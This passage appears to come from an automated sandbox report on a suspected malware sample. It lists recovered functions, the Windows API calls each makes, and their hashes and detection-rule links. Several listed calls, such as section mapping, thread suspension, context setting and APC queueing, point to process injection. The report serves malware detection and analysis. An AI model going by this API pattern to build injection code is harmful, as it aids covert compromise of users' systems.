NtAllocateVirtualMemory.NTDLL(00010000,00000000,00FC0C62,?,00000000,00000000,00FC0C62,00000000), ref: 00FD18E1

Memory Dump Source

Source File: 00000000.00000002.4518783364.00FBA000.00000040.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4518759786.00FB0000.00000002.sdmp Download File
Associated: 00000000.00000002.4518765881.00FB1000.00000020.sdmp Download File
Associated: 00000000.00000002.4518774745.00FB7000.00000002.sdmp Download File
Associated: 00000000.00000002.4518805542.00FE5000.00000080.sdmp Download File
Associated: 00000000.00000002.4518867202.0107F000.00000040.sdmp Download File
Associated: 00000000.00000002.4518875989.01081000.00000002.sdmp Download File

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 205979830db8480e991c47d28671a9f78363428c8c8e516eb6e529daac0c5e95
Instruction ID: 96c68d495a336ed8cecddc0b90bbc6930a520c90a510cc7f1de41375692b9e19
Opcode Fuzzy Hash: 205979830db8480e991c47d28671a9f78363428c8c8e516eb6e529daac0c5e95
Instruction Fuzzy Hash: 70F05EB62002087BCB14DF88CC40EE777ADAF88740F108519BA0897341C631F911CBE0

Uniqueness

Uniqueness Score: 0.01%

Function 00FD1778, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(00FCCD1A,5EAE521D,FFFFFFFF,00FCC9D9,?,?,00FCCD1A,?,00FCC9D9,FFFFFFFF,5EAE521D,00FCCD1A,?,00000000), ref: 00FD17BD

Memory Dump Source

Source File: 00000000.00000002.4518783364.00FBA000.00000040.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4518759786.00FB0000.00000002.sdmp Download File
Associated: 00000000.00000002.4518765881.00FB1000.00000020.sdmp Download File
Associated: 00000000.00000002.4518774745.00FB7000.00000002.sdmp Download File
Associated: 00000000.00000002.4518805542.00FE5000.00000080.sdmp Download File
Associated: 00000000.00000002.4518867202.0107F000.00000040.sdmp Download File
Associated: 00000000.00000002.4518875989.01081000.00000002.sdmp Download File

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 773b85cd05e082e0fdac1608cbafad528eebedb90476b680c43729c2f95548ad
Instruction ID: 6e032a4a2bc1bd0621e1f7b15f471885294a14862e46850a0df84302a2dc8646
Opcode Fuzzy Hash: 773b85cd05e082e0fdac1608cbafad528eebedb90476b680c43729c2f95548ad
Instruction Fuzzy Hash: AEF0A4B2200208ABDB14DF89DC85EEB77ADAF8C754F158249BA1DA7241D630E911CBA0

Uniqueness

Uniqueness Score: 0.01%

Function 00FD18A8, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00010000,00000000,00FC0C62,?,00000000,00000000,00FC0C62,00000000), ref: 00FD18E1

Memory Dump Source

Source File: 00000000.00000002.4518783364.00FBA000.00000040.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4518759786.00FB0000.00000002.sdmp Download File
Associated: 00000000.00000002.4518765881.00FB1000.00000020.sdmp Download File
Associated: 00000000.00000002.4518774745.00FB7000.00000002.sdmp Download File
Associated: 00000000.00000002.4518805542.00FE5000.00000080.sdmp Download File
Associated: 00000000.00000002.4518867202.0107F000.00000040.sdmp Download File
Associated: 00000000.00000002.4518875989.01081000.00000002.sdmp Download File

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 207a3c7abc822d1de6691faca5a0b2510e3f12b480a5f0f85a33c41cb65f0f0f
Instruction ID: db7eff4b5e3df32a44989efb5ac5c480d202b7c168050bfecbf71e6f7ad7134c
Opcode Fuzzy Hash: 207a3c7abc822d1de6691faca5a0b2510e3f12b480a5f0f85a33c41cb65f0f0f
Instruction Fuzzy Hash: A7F015B6200208ABDB14DF89CC81EEB77ADAF88750F018149BE08A7241C630F910CBE0

Uniqueness

Uniqueness Score: 0.01%

Function 00FD17F8, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00FCCCF8,?,?,00FCCCF8,00000000,FFFFFFFF), ref: 00FD181D

Memory Dump Source

Source File: 00000000.00000002.4518783364.00FBA000.00000040.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4518759786.00FB0000.00000002.sdmp Download File
Associated: 00000000.00000002.4518765881.00FB1000.00000020.sdmp Download File
Associated: 00000000.00000002.4518774745.00FB7000.00000002.sdmp Download File
Associated: 00000000.00000002.4518805542.00FE5000.00000080.sdmp Download File
Associated: 00000000.00000002.4518867202.0107F000.00000040.sdmp Download File
Associated: 00000000.00000002.4518875989.01081000.00000002.sdmp Download File

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 09738727b7d691bb66e3a69be04bbf645e97aa87041d07b4d500cd114f34a8bc
Instruction ID: 8c1bc82b4b17ed2e68e3cf9d898a491e5cdaef68144c333a53f97123a0309239
Opcode Fuzzy Hash: 09738727b7d691bb66e3a69be04bbf645e97aa87041d07b4d500cd114f34a8bc
Instruction Fuzzy Hash: 68D012722002146BD614EB98CC45EDB775DEF44650F054455BA1C5B242C530F60487E0

Uniqueness

Uniqueness Score: 0.01%

Function 00FB34EA, Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000034A8), ref: 00FB34EF

Memory Dump Source

Source File: 00000000.00000002.4518765881.00FB1000.00000020.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4518759786.00FB0000.00000002.sdmp Download File
Associated: 00000000.00000002.4518774745.00FB7000.00000002.sdmp Download File
Associated: 00000000.00000002.4518783364.00FBA000.00000040.sdmp Download File
Associated: 00000000.00000002.4518805542.00FE5000.00000080.sdmp Download File
Associated: 00000000.00000002.4518867202.0107F000.00000040.sdmp Download File
Associated: 00000000.00000002.4518875989.01081000.00000002.sdmp Download File

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 469c50edb4c96dda0cd8f6d4525961f9460006263bf136fc2682510863334cb4
Instruction ID: 24da0f5c53da09f14f38b48a1341e79769c95f78eb3c7f51eeda537da9bf26ca
Opcode Fuzzy Hash: 469c50edb4c96dda0cd8f6d4525961f9460006263bf136fc2682510863334cb4
Instruction Fuzzy Hash: 159002A42992049656067B757C4944539909AC876276105516005D4094DB5091447D22

Uniqueness

Uniqueness Score: 0.01%

Function 026062E0, Relevance: 1.5, APIs: 1, Instructions: 4nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL ref: 026062EA

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 19b54636ee8b8ea2c063f85caf027ac1a05ee1b7eb0cb60abfca085cc20752dd
Instruction ID: 321c83c545bd7314009f871ab3b5c709f0472f9fcb93c4b8e19b5a49dda68f40
Opcode Fuzzy Hash: 19b54636ee8b8ea2c063f85caf027ac1a05ee1b7eb0cb60abfca085cc20752dd
Instruction Fuzzy Hash: F7A0023960440957EB119E68C408647A613EBA1751F1A9492B982CA58ECFE488E6EA25

Uniqueness

Uniqueness Score: 0.01%

Function 02606360, Relevance: 1.5, APIs: 1, Instructions: 4nativethreadCOMMON

Download Yara Rule

APIs

NtQueueApcThread.NTDLL ref: 0260636A

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID: QueueThread
String ID:
API String ID: 1850944927-0
Opcode ID: 3e684fdc6bc0a6990e0097e24b7def498b481657123c9b64cbcf010e287aa868
Instruction ID: f42b9d1b7df806d0302af1cd622380e710b3e2259dc6e63803b494df58604a47
Opcode Fuzzy Hash: 3e684fdc6bc0a6990e0097e24b7def498b481657123c9b64cbcf010e287aa868
Instruction Fuzzy Hash: D1A0023960400A57F6119AE4E40C6476611EB91751B198492BB52CA55ECAB488A5DA31

Uniqueness

Uniqueness Score: 0.03%

Function 02605350, Relevance: 1.5, APIs: 1, Instructions: 4nativeCOMMON

Download Yara Rule

APIs

NtAdjustPrivilegesToken.NTDLL ref: 0260535A

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: fe9722839d52a146556d09e205060fc4cbc1a80346fa67bfade4ad088c8848fd
Instruction ID: d6669e9d2a01cf9ba61b27b34d1f0f955e8f839bed5c0a69a1da99c7a85536c1
Opcode Fuzzy Hash: fe9722839d52a146556d09e205060fc4cbc1a80346fa67bfade4ad088c8848fd
Instruction Fuzzy Hash: 81A0223820000A8BE2082B20C008B03B320CBC0300F00C280B282CA00FCA2088088B20

Uniqueness

Uniqueness Score: 0.03%

Function 026063E0, Relevance: 1.5, APIs: 1, Instructions: 4nativeCOMMON

Download Yara Rule

APIs

NtReadVirtualMemory.NTDLL ref: 026063EA

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID: MemoryReadVirtual
String ID:
API String ID: 2834387570-0
Opcode ID: 120677514428084007677b856dfb679c0cf9f615979ef5216ef4fc1670d05fdf
Instruction ID: 227cce7aeca5cb0b6c678f70eef4bb456c8024c57fc1a221296564235d72fa9f
Opcode Fuzzy Hash: 120677514428084007677b856dfb679c0cf9f615979ef5216ef4fc1670d05fdf
Instruction Fuzzy Hash: B4A00239A0441D97E715EE64C4095877A12EBE1711B198092BB02CB55ECF7488A5D631

Uniqueness

Uniqueness Score: 0.02%

Function 026053C0, Relevance: 1.5, APIs: 1, Instructions: 4memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL ref: 026053CA

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 77579fc15781d5862f584378d1fb7eb7b919d58439f65127f6e889b9ccf2a8e0
Instruction ID: 71570ab3d67eacb95af149b984e33920f8acf534d5fc71dfb991a8aed88f1c8d
Opcode Fuzzy Hash: 77579fc15781d5862f584378d1fb7eb7b919d58439f65127f6e889b9ccf2a8e0
Instruction Fuzzy Hash: D4A0023DB0800D67D6616A74C01874B6611EB91305F55C0D27502EB94ECFA58B59EBA1

Uniqueness

Uniqueness Score: 0.01%

Function 026063A0, Relevance: 1.5, APIs: 1, Instructions: 4filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL ref: 026063AA

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: ca06746b33f6c72f552c81ae6a9de87153c0b41bc17df4cefa440feaa0ab411b
Instruction ID: 1648ecef0612f9b1605aaeecd0cfeea3a0ffb98282df29a1ab45e14667d7088e
Opcode Fuzzy Hash: ca06746b33f6c72f552c81ae6a9de87153c0b41bc17df4cefa440feaa0ab411b
Instruction Fuzzy Hash: 71A0223C30000E33E2288AB0C80808BA200EBC0300B0080833F00CB00ECCB08830C220

Uniqueness

Uniqueness Score: 0.01%

Function 026058B0, Relevance: 1.5, APIs: 1, Instructions: 4nativeCOMMON

Download Yara Rule

APIs

NtDelayExecution.NTDLL ref: 026058BA

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID: DelayExecution
String ID:
API String ID: 1249177460-0
Opcode ID: 5996ea4e8efd3618978bb921e05faa0104582ab77e89e3c9f3dadb8c4c3811fe
Instruction ID: 5ccd1430404447d19d7445165d275aacf6e5fb5f05216f7fffafba486aa64503
Opcode Fuzzy Hash: 5996ea4e8efd3618978bb921e05faa0104582ab77e89e3c9f3dadb8c4c3811fe
Instruction Fuzzy Hash: 80A00279644405A7D6416AB4D008607E612FBE1701F15C09175C1DA54FCDA68C6DCB31

Uniqueness

Uniqueness Score: 0.03%

Function 02606130, Relevance: 1.5, APIs: 1, Instructions: 4nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 0260613A

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 00eb67c725a3be451c27f58f9b3266f852e4919f8406784a9da55abee8cff977
Instruction ID: cb90fbc1ee16c13be41e8a6ee4b8cf0b587a53f72ec4c7a524db29b17d62ea30
Opcode Fuzzy Hash: 00eb67c725a3be451c27f58f9b3266f852e4919f8406784a9da55abee8cff977
Instruction Fuzzy Hash: 1AA0223830000A0BC2002A20C038B0B3E00EBA2302F00C080B302CA00ECA308802E232

Uniqueness

Uniqueness Score: 0.02%

Function 02606980, Relevance: 1.5, APIs: 1, Instructions: 4nativethreadCOMMON

Download Yara Rule

APIs

NtSuspendThread.NTDLL ref: 0260698A

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID: SuspendThread
String ID:
API String ID: 3178671153-0
Opcode ID: 05305b234f3178e8c1f39c1c5290283d50ccba00849e4a11aa98d38c0b0f6da7
Instruction ID: 940ee023f7c7d75e5e2e337bb74fa3e4a4ae175b616140c7d2a8d2513806412a
Opcode Fuzzy Hash: 05305b234f3178e8c1f39c1c5290283d50ccba00849e4a11aa98d38c0b0f6da7
Instruction Fuzzy Hash: 3DA0223830000003F2003B20CC08003A202EBB0300F0280A83000CA00ECC2088AA8322

Uniqueness

Uniqueness Score: 0.03%

Function 02606650, Relevance: 1.5, APIs: 1, Instructions: 4nativethreadCOMMON

Download Yara Rule

APIs

NtSetContextThread.NTDLL ref: 0260665A

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 8bf403933fbc620b7190f386b3496bff6ec41089e01070508500c0d947707c86
Instruction ID: 3f06c6915dd1dc3453ab88a83ac6632363c38e4a8d8116db04306a0f93fa6415
Opcode Fuzzy Hash: 8bf403933fbc620b7190f386b3496bff6ec41089e01070508500c0d947707c86
Instruction Fuzzy Hash: 20A0223820000083C2002E30C008203B200EBA2300FA080C0B000CA20CC820880AC320

Uniqueness

Uniqueness Score: 0.04%

Function 026056B0, Relevance: 1.5, APIs: 1, Instructions: 4filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL ref: 026056BA

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: dd57403420670cc052a7c00cc3b4384eb06e4d653f9c6f9a46494791e598f213
Instruction ID: 16edf6226e25c33b4568c335db79eb190732a3ea7ce9a444e4ce6dec640b41fa
Opcode Fuzzy Hash: dd57403420670cc052a7c00cc3b4384eb06e4d653f9c6f9a46494791e598f213
Instruction Fuzzy Hash: 53A022B8300000C3C2002E38C02CB033A00EBE0300F8280803200CA00EC8A88C208228

Uniqueness

Uniqueness Score: 0.01%

Function 026057D0, Relevance: 1.5, APIs: 1, Instructions: 4nativeCOMMON

Download Yara Rule

APIs

NtCreateSection.NTDLL ref: 026057DA

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID: CreateSection
String ID:
API String ID: 2449625523-0
Opcode ID: 98b489cce1f956f6ae5c82d0770897793c15411501e973cab7dde128a8f82a2e
Instruction ID: 63667514f10296bef8f92587a109f1daffd32be06b7f066ea5840ca4598b3d11
Opcode Fuzzy Hash: 98b489cce1f956f6ae5c82d0770897793c15411501e973cab7dde128a8f82a2e
Instruction Fuzzy Hash: A0A02238A0080ACBCA02AB20C008B032200CBB0302F0080803A02CA00FCA30CC88CF30

Uniqueness

Uniqueness Score: 0.02%

Function 02605D10, Relevance: 1.5, APIs: 1, Instructions: 4nativeCOMMON

Download Yara Rule

APIs

NtMapViewOfSection.NTDLL ref: 02605D1A

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 568567a7a1fcefef4a7508d57ba58d83b2aff0c981a521b32eb1f25c408d9a40
Instruction ID: 6340d1ffdc97a31ed24c235934fda00b8785bcaaa31a0dab4c2b0390fe5f869d
Opcode Fuzzy Hash: 568567a7a1fcefef4a7508d57ba58d83b2aff0c981a521b32eb1f25c408d9a40
Instruction Fuzzy Hash: 04A0023DB251095BDA826A68C00860F6611DBD3302F55C0957541DA58DCD69886D8772

Uniqueness

Uniqueness Score: 0.01%

Function 026055B0, Relevance: 1.5, APIs: 1, Instructions: 4nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL ref: 026055BA

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 1bd502fa443decfee3f6fb02675e56574d4f6187b365cceed5907ab434f0e7d9
Instruction ID: 0fa9de4f568ba71ce558ee7f744bdc7bbe6fe2b3559dc97726e0527b4017e6e8
Opcode Fuzzy Hash: 1bd502fa443decfee3f6fb02675e56574d4f6187b365cceed5907ab434f0e7d9
Instruction Fuzzy Hash: 35A022B820000003CA020A2CC02C203E200EBE0300F8280A23200CA00EC8B088C3CA20

Uniqueness

Uniqueness Score: 0.01%

Function 02606590, Relevance: 1.5, APIs: 1, Instructions: 4nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL ref: 0260659A

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 4c768e2465eb8c4c1deacaa50c38028ed63d0844f3cb7116278df18acd82383c
Instruction ID: 12dfcf450153aabd1c6f78561e1a961d7f98f04d98739e0bc5e15ec4234ae168
Opcode Fuzzy Hash: 4c768e2465eb8c4c1deacaa50c38028ed63d0844f3cb7116278df18acd82383c
Instruction Fuzzy Hash: 25A0223820000883CA022E3CC008003E200EBE0300F0080803080CF00CC82088CBC320

Uniqueness

Uniqueness Score: 0.03%

Function 00FC1F58, Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4518783364.00FBA000.00000040.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4518759786.00FB0000.00000002.sdmp Download File
Associated: 00000000.00000002.4518765881.00FB1000.00000020.sdmp Download File
Associated: 00000000.00000002.4518774745.00FB7000.00000002.sdmp Download File
Associated: 00000000.00000002.4518805542.00FE5000.00000080.sdmp Download File
Associated: 00000000.00000002.4518867202.0107F000.00000040.sdmp Download File
Associated: 00000000.00000002.4518875989.01081000.00000002.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20ce34c0c9646c3085f45bb273c732fa36bd1b466665dbe825d988834e69c488
Instruction ID: 29f6a1c23a8f0aaaaf71064608de0a76614aa685880d36f9d5b231efdd26dce7
Opcode Fuzzy Hash: 20ce34c0c9646c3085f45bb273c732fa36bd1b466665dbe825d988834e69c488
Instruction Fuzzy Hash: C92128B2C4020A5BCB24D6649E43FFF73BCAF51310F08056EF94992141F734AA59EBA1

Uniqueness

Uniqueness Score: 0.00%

Function 02605AC0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce6f19852b224d0a46a2daaf93ba45d9ccb3c4ef47469f2ec1f8c44d11f36dfd
Instruction ID: 4d7c52abc0555946132e4968fbf9cd7269a0acd80d5d5af173ad788e043f2ede
Opcode Fuzzy Hash: ce6f19852b224d0a46a2daaf93ba45d9ccb3c4ef47469f2ec1f8c44d11f36dfd
Instruction Fuzzy Hash: F2A02238A0800A0BC2020AA0C028B032202EBC0300F00C08030C2CA08ECEF08800A3A0

Uniqueness

Uniqueness Score: 0.00%

Function 00FB25B9, Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00FB1A50), ref: 00FB25C1
__mtterm.LIBCMT ref: 00FB25CD
GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,00FB1A50), ref: 00FB25E3
GetProcAddress.KERNEL32(00000000,FlsGetValue,?,00FB1A50), ref: 00FB25F0
GetProcAddress.KERNEL32(00000000,FlsSetValue,?,00FB1A50), ref: 00FB25FD
GetProcAddress.KERNEL32(00000000,FlsFree,?,00FB1A50), ref: 00FB260A
TlsAlloc.KERNEL32(?,00FB1A50), ref: 00FB265A
TlsSetValue.KERNEL32(00000000,?,00FB1A50), ref: 00FB2675
__init_pointers.LIBCMT ref: 00FB267F

Part of subcall function 00FB1D67: __initp_misc_winsig.LIBCMT ref: 00FB1D8A

RtlEncodePointer.NTDLL(?,00FB1A50), ref: 00FB2690
RtlEncodePointer.NTDLL(?,00FB1A50), ref: 00FB269D
RtlEncodePointer.NTDLL(?,00FB1A50), ref: 00FB26AA
RtlEncodePointer.NTDLL(?,00FB1A50), ref: 00FB26B7

Part of subcall function 00FB4068: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000FA0), ref: 00FB4090

RtlDecodePointer.NTDLL(00FB248A,?,00FB1A50), ref: 00FB26D8
__calloc_crt.LIBCMT ref: 00FB26ED

Part of subcall function 00FB4BC5: Sleep.KERNEL32(00000000,00000008,00FB10B4), ref: 00FB4BED

RtlDecodePointer.NTDLL(00000000,?,00FB1A50), ref: 00FB2707

Part of subcall function 00FB2343: GetModuleHandleW.KERNEL32(KERNEL32.DLL,00FB9320,00000008,00FB244B,00000000,00000000,?,?,00FB2478,?,00FB1787,00FB9270,00000008,00FB10B4), ref: 00FB2354
Part of subcall function 00FB2343: __lock.LIBCMT ref: 00FB2388
Part of subcall function 00FB2343: InterlockedIncrement.KERNEL32(206E6920), ref: 00FB2395
Part of subcall function 00FB2343: __lock.LIBCMT ref: 00FB23A9
Part of subcall function 00FB2343: ___addlocaleref.LIBCMT ref: 00FB23C7

GetCurrentThreadId.KERNEL32(?,00FB1A50), ref: 00FB2719
__mtterm.LIBCMT ref: 00FB272A

Part of subcall function 00FB2306: DecodePointer.KERNEL32(00000003,00FB272F,?,00FB1A50), ref: 00FB2317
Part of subcall function 00FB2306: TlsFree.KERNEL32(00000005,00FB272F,?,00FB1A50), ref: 00FB2331
Part of subcall function 00FB2306: DeleteCriticalSection.KERNEL32(00000000,00000000,7764A585,?,00FB272F,?,00FB1A50), ref: 00FB40CF
Part of subcall function 00FB2306: _free.LIBCMT ref: 00FB40D2
Part of subcall function 00FB2306: DeleteCriticalSection.KERNEL32(00000005,7764A585,?,00FB272F,?,00FB1A50), ref: 00FB40F9

Strings

FlsGetValue, xrefs: 00FB25E5
FlsFree, xrefs: 00FB25FF
FlsAlloc, xrefs: 00FB25DD
FlsSetValue, xrefs: 00FB25F2
KERNEL32.DLL, xrefs: 00FB25BC

Memory Dump Source

Source File: 00000000.00000002.4518765881.00FB1000.00000020.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4518759786.00FB0000.00000002.sdmp Download File
Associated: 00000000.00000002.4518774745.00FB7000.00000002.sdmp Download File
Associated: 00000000.00000002.4518783364.00FBA000.00000040.sdmp Download File
Associated: 00000000.00000002.4518805542.00FE5000.00000080.sdmp Download File
Associated: 00000000.00000002.4518867202.0107F000.00000040.sdmp Download File
Associated: 00000000.00000002.4518875989.01081000.00000002.sdmp Download File

Yara matches

Similarity

API ID: Pointer$AddressEncodeProc$CriticalDecodeSection$DeleteHandleModule__lock__mtterm$AllocCountCurrentFreeIncrementInitializeInterlockedSleepSpinThreadValue___addlocaleref__calloc_crt__init_pointers__initp_misc_winsig_free
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 1149409264-3819984048
Opcode ID: cd39614a22c8b630ba797682d7c14676628aceb3b219947b7ac9891610348cce
Instruction ID: 0185f1afac5ef6b3ff50117f22b2e25c38da92b91ff125f7eca814da514680c7
Opcode Fuzzy Hash: cd39614a22c8b630ba797682d7c14676628aceb3b219947b7ac9891610348cce
Instruction Fuzzy Hash: 3F3190318083549BCBB17B7AAC8C6993FA1FBC5770B10061AF4D4D62ACDB3A8448EF51

Uniqueness

Uniqueness Score: 1.51%

Function 00FB1360, Relevance: 27.2, APIs: 18, Instructions: 239windowsleepUNIQUE

Download Yara Rule

APIs

PostQuitMessage.USER32(00000000), ref: 00FB13AC
LoadIconW.USER32(?,0000006B), ref: 00FB13BD
GetSystemMetrics.USER32(0000000B), ref: 00FB13D0
GetSystemMetrics.USER32(0000000C), ref: 00FB13D9
CharUpperW.USER32(?), ref: 00FB13F4
GetDlgItem.USER32(?,00000000), ref: 00FB1406
SendMessageW.USER32(00000000,000000F3,00000001,00000000), ref: 00FB1426
Sleep.KERNEL32(00000064), ref: 00FB142A
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00FB143A
BeginPaint.USER32(?,?), ref: 00FB1442
CreateSolidBrush.GDI32(?), ref: 00FB14D9
FillRect.USER32(?,00000000,00000000), ref: 00FB14EC
DeleteObject.GDI32(00000000), ref: 00FB14F3
EndPaint.USER32(?,?), ref: 00FB1514
DefWindowProcW.USER32(?,?,?,?), ref: 00FB1555
DestroyWindow.USER32(000A0106), ref: 00FB1575

Part of subcall function 00FB1000: _memset.LIBCMT ref: 00FB101F
Part of subcall function 00FB1000: _memset.LIBCMT ref: 00FB1038

SetFocus.USER32(?), ref: 00FB15D0

Part of subcall function 00FB191C: __isxdigit_l.LIBCMT ref: 00FB1943

Part of subcall function 00FB1898: __isdigit_l.LIBCMT ref: 00FB18BD

Part of subcall function 00FB11C0: wsprintfW.USER32 ref: 00FB11DF
Part of subcall function 00FB11C0: SetDlgItemTextW.USER32(?,0000001B,?), ref: 00FB11EF

MessageBeep.USER32(00000000), ref: 00FB168F

Part of subcall function 00FB16B6: IsDebuggerPresent.KERNEL32 ref: 00FB1CC7
Part of subcall function 00FB16B6: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00FB1CDC
Part of subcall function 00FB16B6: UnhandledExceptionFilter.KERNEL32(00FB71B8), ref: 00FB1CE7
Part of subcall function 00FB16B6: GetCurrentProcess.KERNEL32(C0000409), ref: 00FB1D03
Part of subcall function 00FB16B6: TerminateProcess.KERNEL32(00000000), ref: 00FB1D0A

Memory Dump Source

Source File: 00000000.00000002.4518765881.00FB1000.00000020.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4518759786.00FB0000.00000002.sdmp Download File
Associated: 00000000.00000002.4518774745.00FB7000.00000002.sdmp Download File
Associated: 00000000.00000002.4518783364.00FBA000.00000040.sdmp Download File
Associated: 00000000.00000002.4518805542.00FE5000.00000080.sdmp Download File
Associated: 00000000.00000002.4518867202.0107F000.00000040.sdmp Download File
Associated: 00000000.00000002.4518875989.01081000.00000002.sdmp Download File

Yara matches

Similarity

API ID: Message$ExceptionFilterItemMetricsPaintProcessSendSystemUnhandledWindow_memset$BeepBeginBrushCharCreateCurrentDebuggerDeleteDestroyFillFocusIconLoadObjectPostPresentProcQuitRectSleepSolidTerminateTextUpper__isdigit_l__isxdigit_lwsprintf
String ID:
API String ID: 3436449669-0
Opcode ID: a45fed1b749e707846d66bf8c01d6b86f71f1e835cb25ebcd7d4308a98984034
Instruction ID: 067cbb634113975c0e08dfee0ad2c28225a9df9b22c59bdabca262d626b91f2c
Opcode Fuzzy Hash: a45fed1b749e707846d66bf8c01d6b86f71f1e835cb25ebcd7d4308a98984034
Instruction Fuzzy Hash: 4A811A72A083048BD324EF2DDCA967A77A6FBC9310F44462AF581C7399DB399804EF51

Uniqueness

Uniqueness Score: 100.00%

Function 00FB5CD7, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52memoryUNIQUE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00000008,00000000,?,00FB4BDB,00FB10B4,00000008,00000000,00000000,00000000,?,00FB2422,00000001,00000214), ref: 00FB5D1A

Part of subcall function 00FB228D: DecodePointer.KERNEL32(?,00FB5D33,00000008,00000000,?,00FB4BDB,00FB10B4,00000008,00000000,00000000,00000000,?,00FB2422,00000001,00000214), ref: 00FB2298

Part of subcall function 00FB226B: __getptd_noexit.LIBCMT ref: 00FB226B

Strings

v.dw, xrefs: 00FB5D1A

Memory Dump Source

Source File: 00000000.00000002.4518765881.00FB1000.00000020.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4518759786.00FB0000.00000002.sdmp Download File
Associated: 00000000.00000002.4518774745.00FB7000.00000002.sdmp Download File
Associated: 00000000.00000002.4518783364.00FBA000.00000040.sdmp Download File
